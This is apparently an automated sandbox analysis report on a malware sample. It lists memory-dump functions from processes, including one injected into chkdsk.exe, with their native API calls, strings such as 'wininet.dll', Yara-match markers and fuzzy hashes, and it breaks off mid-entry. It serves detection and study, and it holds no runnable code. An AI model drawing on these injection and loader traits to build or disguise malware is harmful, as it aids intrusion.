Instruction ID: 91cc1d4b0b5b4ee232ee6d668d6f4b1718dc9a73d37b6fc5df90eff98e253359
Opcode Fuzzy Hash: e805a2e0436ddf53e07500caa08421984fb84a6deb54feca93e3af95113dd7c4
Instruction Fuzzy Hash: 0390027134101052A501A6D99808A4A4555B7F0345B51D815A4004954CC59488A16161

Uniqueness

Uniqueness Score: -1.00%

Function 01509730, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.298432455.00000000014A0000.00000040.00000001.sdmp, Offset: 014A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 359cbb41ed7bd58ea1581a622f9f2eb636af4a74e1931ce9b7261445bd433cd8
Instruction ID: 0829b7ee2a3a20346e1357d9602e7c4a4fa508f7a6e68e6392a93d9ac4a3ab2c
Opcode Fuzzy Hash: 359cbb41ed7bd58ea1581a622f9f2eb636af4a74e1931ce9b7261445bd433cd8
Instruction Fuzzy Hash: 7890026164501402E1417199941C7060465B7D0245F51D811A0014954DC6998A9576E1

Uniqueness

Uniqueness Score: -1.00%

Function 01509650, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.298432455.00000000014A0000.00000040.00000001.sdmp, Offset: 014A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4870f7731f1d61c2d16103c8e99b3f4139b94a55e2e752a567914a9b6618c00
Instruction ID: 4ccb37335b934c4d7027018afffc04776a2fb54c1975ac70cfb87b937dfb94c8
Opcode Fuzzy Hash: a4870f7731f1d61c2d16103c8e99b3f4139b94a55e2e752a567914a9b6618c00
Instruction Fuzzy Hash: C690027124505842E14171998408A460465B7D0349F51C811A0054A94DD6658D95B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 01509610, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.298432455.00000000014A0000.00000040.00000001.sdmp, Offset: 014A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db42341e200627cf7c047d2201c5d360d3e0a43f41d11b17ffe5e448cb06bc5c
Instruction ID: 23f2b35f2e94e86c3b232ad066acd020bfda1be34a6b32531d7ce4ebb63b63d3
Opcode Fuzzy Hash: db42341e200627cf7c047d2201c5d360d3e0a43f41d11b17ffe5e448cb06bc5c
Instruction Fuzzy Hash: B590027164501802E151719984187460455B7D0345F51C811A0014A54DC7958A9576E1

Uniqueness

Uniqueness Score: -1.00%

Function 015096D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.298432455.00000000014A0000.00000040.00000001.sdmp, Offset: 014A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c4bb2489af173d4e055753fb218f6f972d2dc820375234b7f08fa2ea4de2a7f
Instruction ID: dada90bcaeb062d0a77d95e83bc0568ef66998e128e22acef7fa2f19035953ee
Opcode Fuzzy Hash: 9c4bb2489af173d4e055753fb218f6f972d2dc820375234b7f08fa2ea4de2a7f
Instruction Fuzzy Hash: FB90027124101842E10161998408B460455B7E0345F51C816A0114A54DC655C8917561

Uniqueness

Uniqueness Score: -1.00%

Function 01509670, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.298432455.00000000014A0000.00000040.00000001.sdmp, Offset: 014A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: ae4991060dc1b8ec05e3511c12fba1a6bf21fd95af35a1f0fd802eaf2661a4bc
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0155FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0155FDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0155FE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0155FE2B

Memory Dump Source

Source File: 00000005.00000002.298432455.00000000014A0000.00000040.00000001.sdmp, Offset: 014A0000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 80786535d80ae485e1aeec1cfc78dadd952e2a98cace151864189372e1daaa2d
Instruction ID: f26daae32e3a0473f7c660b9663a20b0027db150dce017d997cacfde49b80bbc
Opcode Fuzzy Hash: 80786535d80ae485e1aeec1cfc78dadd952e2a98cace151864189372e1daaa2d
Instruction Fuzzy Hash: 78F0FC321001027FD7611A95DC01F637F5AFB84770F240316FA245A1E1EA62F86096F0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: chkdsk.exe PID: 6364 Parent PID: 3472 chkdsk.exeCOMMON

Executed Functions

Function 00BB81B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00BB3B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00BB3B87,007A002E,00000000,00000060,00000000,00000000), ref: 00BB81FD

Strings

.z`, xrefs: 00BB81ED, 00BB81F8

Memory Dump Source

Source File: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: d2aa12a64f56e104cd25abb8ca461f4167b93f8c0c3d2f7850ec7af260d7f267
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 22F0B6B2200108ABCB08CF88DC85DEB77EDAF8C754F158248BA0D97241C630E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00BB81AB, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00BB3B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00BB3B87,007A002E,00000000,00000060,00000000,00000000), ref: 00BB81FD

Strings

.z`, xrefs: 00BB81ED, 00BB81F8

Memory Dump Source

Source File: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 019e5bc349cfefc69d6aece4fa64520ccbdbbd997a16319b6a96840e96369af6
Instruction ID: dbc1f4203c50fbfb46259022cb33e7f008af241a6dbbdf111fa22a8d69af8ccc
Opcode Fuzzy Hash: 019e5bc349cfefc69d6aece4fa64520ccbdbbd997a16319b6a96840e96369af6
Instruction Fuzzy Hash: A101A4B2204108AFCB08CF89DC85DEB77A9AF8C354F158249FA1D97250D630E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00BB8260, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(00BB3D42,5E972F59,FFFFFFFF,00BB3A01,?,?,00BB3D42,?,00BB3A01,FFFFFFFF,5E972F59,00BB3D42,?,00000000), ref: 00BB82A5

Memory Dump Source

Source File: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 86bf8dfef389cf31ce85e4932bba9c84fdd7341d2e097f270675708342ac0456
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 62F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158659BA1D97251DA30E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BB838A, Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00BA2D11,00002000,00003000,00000004), ref: 00BB83C9

Memory Dump Source

Source File: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b186ea4b1e96adaa7cf84665ed70106e52f191d4ef9924372faf84558c764d16
Instruction ID: 2a5eedcd9cb3d76e2c770362520dd93ca3703345ed69987a54aa034d0f420cda
Opcode Fuzzy Hash: b186ea4b1e96adaa7cf84665ed70106e52f191d4ef9924372faf84558c764d16
Instruction Fuzzy Hash: 8EF058B2600108AFCB14CF98CC80EEB77A9AF88240F10824DFA0997281C630E810CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BB8390, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00BA2D11,00002000,00003000,00000004), ref: 00BB83C9

Memory Dump Source

Source File: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 1349c1d46bd28ee6c550d01f39d04e61ec557e1696263177ab3143ea2925dd90
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: E0F015B2200208ABCB14DF89CC81EEB77ADAF88750F118559BE0897241CA30F810CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00BB82E0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00BB3D20,?,?,00BB3D20,00000000,FFFFFFFF), ref: 00BB8305

Memory Dump Source

Source File: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 5f6c87d009505528665ee1b702ddeec83f37b0e631ed62c9772c765c1aca4199
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: ECD012752002146BD710EF98CC85EE7779CEF44750F154499BA185B242C970F90086E0

Uniqueness

Uniqueness Score: -1.00%

Function 05589540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0558954A

Memory Dump Source

Source File: 00000010.00000002.499912263.0000000005520000.00000040.00000001.sdmp, Offset: 05520000, based on PE: true

Associated: 00000010.00000002.500268388.000000000563B000.00000040.00000001.sdmp Download File
Associated: 00000010.00000002.500281857.000000000563F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e3f4fd11fd356f853ec8e6259142bffed236e5e7e5bf2e2d6aa2db4df96186a2
Instruction ID: f68949cfa986b06979d74b48504a037c2328851369a6e501316447706643f2b6
Opcode Fuzzy Hash: e3f4fd11fd356f853ec8e6259142bffed236e5e7e5bf2e2d6aa2db4df96186a2
Instruction Fuzzy Hash: 78900265251000030509A559074450700A6A7D5391391C021F1005550CDA658C6161B1

Uniqueness

Uniqueness Score: -1.00%

Function 05589910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0558991A

Memory Dump Source

Source File: 00000010.00000002.499912263.0000000005520000.00000040.00000001.sdmp, Offset: 05520000, based on PE: true

Associated: 00000010.00000002.500268388.000000000563B000.00000040.00000001.sdmp Download File
Associated: 00000010.00000002.500281857.000000000563F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 700efe78d19ae917b44b29750da65eb45f617eacfdd190199db72f2504104bef
Instruction ID: 8602312563d2a48293875b959a651a1160905ff8d776a19d675dfaea22d53ab8
Opcode Fuzzy Hash: 700efe78d19ae917b44b29750da65eb45f617eacfdd190199db72f2504104bef
Instruction Fuzzy Hash: 619002B124100402D544715945447460065A7D0341F91C011A5054554E8A9D8DD576F5

Uniqueness

Uniqueness Score: -1.00%

Function 055895D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 055895DA

Memory Dump Source

Source File: 00000010.00000002.499912263.0000000005520000.00000040.00000001.sdmp, Offset: 05520000, based on PE: true

Associated: 00000010.00000002.500268388.000000000563B000.00000040.00000001.sdmp Download File
Associated: 00000010.00000002.500281857.000000000563F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2403e309faf1d773fa5611a552b6539ac8325bd77ee59ac73a7715886b242678
Instruction ID: c5e5f377e24e10715c23707d12bd89ccf4134368e01704e67f007da35088a2c2
Opcode Fuzzy Hash: 2403e309faf1d773fa5611a552b6539ac8325bd77ee59ac73a7715886b242678
Instruction Fuzzy Hash: B39002A124200003450971594554616406AA7E0241B91C021E1004590DC9698C9171B5

Uniqueness

Uniqueness Score: -1.00%

Function 055899A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 055899AA

Memory Dump Source

Source File: 00000010.00000002.499912263.0000000005520000.00000040.00000001.sdmp, Offset: 05520000, based on PE: true

Associated: 00000010.00000002.500268388.000000000563B000.00000040.00000001.sdmp Download File
Associated: 00000010.00000002.500281857.000000000563F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 983e4cd13b8b9fad7fbf7d2977629de05a31239e036490155f08632debbe1290
Instruction ID: 56bb22282a81e1d55844b5980e8d84569bd3a8ceb66aae8334b1fe7c254dd740
Opcode Fuzzy Hash: 983e4cd13b8b9fad7fbf7d2977629de05a31239e036490155f08632debbe1290
Instruction Fuzzy Hash: 689002A138100442D50461594554B060065E7E1341F91C015E1054554D8A5DCC5271B6

Uniqueness

Uniqueness Score: -1.00%

Function 05589840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0558984A

Memory Dump Source

Source File: 00000010.00000002.499912263.0000000005520000.00000040.00000001.sdmp, Offset: 05520000, based on PE: true

Associated: 00000010.00000002.500268388.000000000563B000.00000040.00000001.sdmp Download File
Associated: 00000010.00000002.500281857.000000000563F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 23fd7d19e8ebf6d3c77b9fdf7538cc4ee4eaa39f810bc3476f2b6d6494a54761
Instruction ID: fa7f065933d00d80fcc3ed667fb14ade0444187042c28fa4d9ce7472494ed45e
Opcode Fuzzy Hash: 23fd7d19e8ebf6d3c77b9fdf7538cc4ee4eaa39f810bc3476f2b6d6494a54761
Instruction Fuzzy Hash: 80900261282041525949B15945445074066B7E02817D1C012A1404950C896A9C56E6B1

Uniqueness

Uniqueness Score: -1.00%

Function 05589860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0558986A

Memory Dump Source

Source File: 00000010.00000002.499912263.0000000005520000.00000040.00000001.sdmp, Offset: 05520000, based on PE: true

Associated: 00000010.00000002.500268388.000000000563B000.00000040.00000001.sdmp Download File
Associated: 00000010.00000002.500281857.000000000563F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e9266857202777731881d6017bf423ad833a66189ea2c6704e2b8b5b873c1af2
Instruction ID: 0425cc76698e2ab61c0e1c9d22cdec5b926aafe42fe64ba42f555fd96844cfcd
Opcode Fuzzy Hash: e9266857202777731881d6017bf423ad833a66189ea2c6704e2b8b5b873c1af2
Instruction Fuzzy Hash: DE90027124100413D515615946447070069A7D0281FD1C412A0414558D9A9A8D52B1B1

Uniqueness

Uniqueness Score: -1.00%

Function 05589710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0558971A

Memory Dump Source

Source File: 00000010.00000002.499912263.0000000005520000.00000040.00000001.sdmp, Offset: 05520000, based on PE: true

Associated: 00000010.00000002.500268388.000000000563B000.00000040.00000001.sdmp Download File
Associated: 00000010.00000002.500281857.000000000563F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cc9ec367e7fd8a68d9661c2099570aca8f9f11aba884487d3e323eab6d4a808f
Instruction ID: 3c8a116ce837d1ce4571e3ae72e228d61e83a7a5a1afbe2a4a9fef93800d1eda
Opcode Fuzzy Hash: cc9ec367e7fd8a68d9661c2099570aca8f9f11aba884487d3e323eab6d4a808f
Instruction Fuzzy Hash: 7990027124100402D504659955486460065A7E0341F91D011A5014555ECAA98C9171B1

Uniqueness

Uniqueness Score: -1.00%

Function 05589FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05589FEA

Memory Dump Source

Source File: 00000010.00000002.499912263.0000000005520000.00000040.00000001.sdmp, Offset: 05520000, based on PE: true

Associated: 00000010.00000002.500268388.000000000563B000.00000040.00000001.sdmp Download File
Associated: 00000010.00000002.500281857.000000000563F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ee414d112c857dfb7a456608467e2639dec852c515cf6fccf33371c55bf71f38
Instruction ID: af9c6bd85b40094c55c9c2f09565b872b92604668050bcbd00992e71ab69cd4f
Opcode Fuzzy Hash: ee414d112c857dfb7a456608467e2639dec852c515cf6fccf33371c55bf71f38
Instruction Fuzzy Hash: 0990027135114402D514615985447060065A7D1241F91C411A0814558D8AD98C9171B2

Uniqueness

Uniqueness Score: -1.00%

Function 05589780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0558978A

Memory Dump Source

Source File: 00000010.00000002.499912263.0000000005520000.00000040.00000001.sdmp, Offset: 05520000, based on PE: true

Associated: 00000010.00000002.500268388.000000000563B000.00000040.00000001.sdmp Download File
Associated: 00000010.00000002.500281857.000000000563F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 582692742042f282829839fd5079adbb772def3802aefb08c334affde5b5677f
Instruction ID: fe178fff3f0bc4bbaca64a0180b1db2256556d76add7c624819a112c7f057190
Opcode Fuzzy Hash: 582692742042f282829839fd5079adbb772def3802aefb08c334affde5b5677f
Instruction Fuzzy Hash: 5B90026925300002D5847159554860A0065A7D1242FD1D415A0005558CCD598C6963B1

Uniqueness

Uniqueness Score: -1.00%

Function 05589A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05589A5A

Memory Dump Source

Source File: 00000010.00000002.499912263.0000000005520000.00000040.00000001.sdmp, Offset: 05520000, based on PE: true

Associated: 00000010.00000002.500268388.000000000563B000.00000040.00000001.sdmp Download File
Associated: 00000010.00000002.500281857.000000000563F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 107129885938fcc8d1446c29f80e945cedf3ced97a53efa3086fcb1e0e058cf4
Instruction ID: bc65b4813100411f05480a79650c0d92476363f84d9c3ac74b470b116a6da14f
Opcode Fuzzy Hash: 107129885938fcc8d1446c29f80e945cedf3ced97a53efa3086fcb1e0e058cf4
Instruction Fuzzy Hash: 5890026125180042D60465694D54B070065A7D0343F91C115A0144554CCD598C6165B1

Uniqueness

Uniqueness Score: -1.00%

Function 05589650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0558965A

Memory Dump Source

Source File: 00000010.00000002.499912263.0000000005520000.00000040.00000001.sdmp, Offset: 05520000, based on PE: true

Associated: 00000010.00000002.500268388.000000000563B000.00000040.00000001.sdmp Download File
Associated: 00000010.00000002.500281857.000000000563F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a969590c9b48d31af5859a1d0b07755cbdb0c08a448d0ec035c1a894f1c5f489
Instruction ID: 589ec8761365386e2c0b13f5832707163cdc08ac819ec0c9215f8ca6c2924924
Opcode Fuzzy Hash: a969590c9b48d31af5859a1d0b07755cbdb0c08a448d0ec035c1a894f1c5f489
Instruction Fuzzy Hash: F790027124504842D54471594544A460075A7D0345F91C011A0054694D9A698D55B6F1

Uniqueness

Uniqueness Score: -1.00%

Function 05589660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0558966A

Memory Dump Source

Source File: 00000010.00000002.499912263.0000000005520000.00000040.00000001.sdmp, Offset: 05520000, based on PE: true

Associated: 00000010.00000002.500268388.000000000563B000.00000040.00000001.sdmp Download File
Associated: 00000010.00000002.500281857.000000000563F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 284afdb5154bfe8879fe0e1e8adbcfa93bad76cabc519d72c17e0c45a7e2bc39
Instruction ID: 6146f1004a8c14218b37bfe3f11195ba6d0e9c796b3820163808e982266715c1
Opcode Fuzzy Hash: 284afdb5154bfe8879fe0e1e8adbcfa93bad76cabc519d72c17e0c45a7e2bc39
Instruction Fuzzy Hash: 3E90027124100802D5847159454464A0065A7D1341FD1C015A0015654DCE598E5977F1

Uniqueness

Uniqueness Score: -1.00%

Function 055896D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 055896DA

Memory Dump Source

Source File: 00000010.00000002.499912263.0000000005520000.00000040.00000001.sdmp, Offset: 05520000, based on PE: true

Associated: 00000010.00000002.500268388.000000000563B000.00000040.00000001.sdmp Download File
Associated: 00000010.00000002.500281857.000000000563F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e139894574068af78ec4750db869114526af0937adfd618c78c88a3050f1816b
Instruction ID: 0ff43fc4b76fba713f71240c67d8605798a3c138d7b1e6311e1699bf0a90e68b
Opcode Fuzzy Hash: e139894574068af78ec4750db869114526af0937adfd618c78c88a3050f1816b
Instruction Fuzzy Hash: A090027124100842D50461594544B460065A7E0341F91C016A0114654D8A59CC5175B1

Uniqueness

Uniqueness Score: -1.00%

Function 055896E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 055896EA

Memory Dump Source

Source File: 00000010.00000002.499912263.0000000005520000.00000040.00000001.sdmp, Offset: 05520000, based on PE: true

Associated: 00000010.00000002.500268388.000000000563B000.00000040.00000001.sdmp Download File
Associated: 00000010.00000002.500281857.000000000563F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ca542f584a12d3215f508ac40fff62fc1ab32463f6dfb103f2262d0202b6c4af
Instruction ID: a04214a3d4a4753c0a183e533e3ae7fdc887b91dc31b6554a850424705d2af1a
Opcode Fuzzy Hash: ca542f584a12d3215f508ac40fff62fc1ab32463f6dfb103f2262d0202b6c4af
Instruction Fuzzy Hash: 8F90027124108802D5146159854474A0065A7D0341F95C411A4414658D8AD98C9171B1

Uniqueness

Uniqueness Score: -1.00%

Function 00BB6ED0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 00BB6F78

Strings

net.dll, xrefs: 00BB6F41, 00BB6FC7, 00BB6F9F, 00BB6FAB, 00BB6FD3
wininet.dll, xrefs: 00BB6F2E, 00BB6F37

Memory Dump Source

Source File: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 92b6c21bbef76c3a8d5bc1276f6f2fb9934f4006bd11854a24bae3bdd5b7b0af
Instruction ID: b199ddc2109caec809789361897bd42a66d5cdfdcae6dc9198558e8be52aee9c
Opcode Fuzzy Hash: 92b6c21bbef76c3a8d5bc1276f6f2fb9934f4006bd11854a24bae3bdd5b7b0af
Instruction Fuzzy Hash: 51318FB1601704ABC725DFA8D8A1FBBB7F8EB48700F00845DF61A9B241D774B945CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BB6EC6, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 83sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 00BB6F78

Strings

net.dll, xrefs: 00BB6F41, 00BB6F9F, 00BB6FAB
wininet.dll, xrefs: 00BB6F2E, 00BB6F37

Memory Dump Source

Source File: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 266494648877c2d2f4bf4e3f3dd2ab324f77dc33290d785172c9ae8a1760a5d3
Instruction ID: 4b364cb1b72f398e6f1523b7a805e66b83670845e6bc349da6da750d42fdd292
Opcode Fuzzy Hash: 266494648877c2d2f4bf4e3f3dd2ab324f77dc33290d785172c9ae8a1760a5d3
Instruction Fuzzy Hash: 4221C1B1641300ABD714DF98D8E1FBAB7F8EF88704F008059F619AB281D3B4A841CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BB84B2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00BA3B93), ref: 00BB84ED

Strings

.z`, xrefs: 00BB84DC, 00BB84E8

Memory Dump Source

Source File: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: e99dca3f3c84b1ade182769db3a096a632c53cfee87748c4cd079b97bb7c47b3
Instruction ID: f0028d2ee37384bcde3518875b171478c860cbd3a8bb339a6daa2cf832980edb
Opcode Fuzzy Hash: e99dca3f3c84b1ade182769db3a096a632c53cfee87748c4cd079b97bb7c47b3
Instruction Fuzzy Hash: CFE0DFB91106816BEB04EE68E9D18EB33D8AF803107508B6EEC9987602C138C51A8AB1

Uniqueness

Uniqueness Score: -1.00%

Function 00BB84C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00BA3B93), ref: 00BB84ED

Strings

.z`, xrefs: 00BB84DC, 00BB84E8

Memory Dump Source

Source File: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 8a0b408a273a1fda2888cb74760a9debed30fb480bdbbe9bc1c0e213938adb0b
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: FEE01AB12002046BDB14DF59CC45EE777ACAF88750F014559BA0857251CA30E910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 00BA7260, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00BA72BA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00BA72DB

Memory Dump Source

Source File: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 69484e3783eb8d9c01b11df322e2eb6fb39cdd6ef4a8c58721d1981e421daacd
Instruction ID: a121d4b4c13ec523f0b4c6b852cf55ea61b6af3a709a633bd54a03984cd8f4a2
Opcode Fuzzy Hash: 69484e3783eb8d9c01b11df322e2eb6fb39cdd6ef4a8c58721d1981e421daacd
